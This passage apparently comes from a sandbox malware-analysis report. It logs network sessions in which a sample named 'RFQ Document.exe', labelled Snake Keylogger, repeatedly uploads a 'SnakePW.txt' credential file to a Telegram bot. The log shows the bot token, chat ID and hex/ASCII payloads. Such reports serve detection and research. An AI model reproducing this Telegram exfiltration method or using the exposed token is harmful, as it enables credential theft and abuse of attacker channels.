2021-09-28 05:58:39 UTC	133	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 65 36 38 34 66 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cce684f4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:39 UTC	133	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:39 UTC	133	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12666,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.4	49860	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:39 UTC	134	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cd0582ce Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:39 UTC	134	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 30 35 38 32 63 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cd0582ceContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:39 UTC	135	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:39 UTC	135	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12667,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.4	49861	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:39 UTC	136	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cd1d59a0 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:39 UTC	136	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 31 64 35 39 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cd1d59a0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:39 UTC	136	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:39 UTC	137	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12668,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.4	49862	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:39 UTC	137	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cd39f68c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:39 UTC	137	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 33 39 66 36 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cd39f68cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:39 UTC	138	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:39 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:39 UTC	138	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12669,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.4	49863	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:39 UTC	139	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cd51cd5e Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:39 UTC	139	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 35 31 63 64 35 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cd51cd5eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:40 UTC	140	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:40 UTC	140	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12670,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.4	49864	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:40 UTC	140	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cd69a4f9 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:40 UTC	141	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 36 39 61 34 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cd69a4f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:40 UTC	141	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:40 UTC	141	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12671,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.4	49865	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:40 UTC	142	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cd7f1cd4 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:40 UTC	142	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 64 37 66 31 63 64 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cd7f1cd4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:40 UTC	143	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:40 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:40 UTC	143	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 32 30 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12672,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808720,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49783	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:22 UTC	14	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c2eaaeaa Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:22 UTC	14	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 65 61 61 65 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c2eaaeaaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
